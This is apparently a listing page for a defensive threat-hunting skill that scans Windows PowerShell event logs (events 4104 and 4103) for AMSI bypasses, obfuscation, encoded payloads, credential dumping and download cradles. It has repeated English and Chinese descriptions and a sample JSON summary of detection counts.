Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
PowerShell 脚本块日志记录(事件 ID 4104)会记录在 Windows 终端上执行的完整去混淆脚本文本,使其成为狩猎恶意 PowerShell 的主要数据源。结合模块日志(4103)和进程创建事件,分析员即使在攻击者使用混淆层的情况下,也能检测编码命令、AMSI 绕过模式、下载器(download cradles)、凭据窃取工具和无文件攻击技术。
Hunts malicious PowerShell in EVTX files via Script Block (Event 4104) and Module Logging (Event 4103), detecting AMSI bypasses, obfuscation, encoded payloads, credential dumps, and download cradles.
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Detects suspicious PowerShell execution patterns like encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasions. Useful for threat hunting in EDR/SIEM environments with Sysmon.
Share bugs, ideas, or general feedback.
PowerShell 脚本块日志记录(事件 ID 4104)会记录在 Windows 终端上执行的完整去混淆脚本文本,使其成为狩猎恶意 PowerShell 的主要数据源。结合模块日志(4103)和进程创建事件,分析员即使在攻击者使用混淆层的情况下,也能检测编码命令、AMSI 绕过模式、下载器(download cradles)、凭据窃取工具和无文件攻击技术。
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}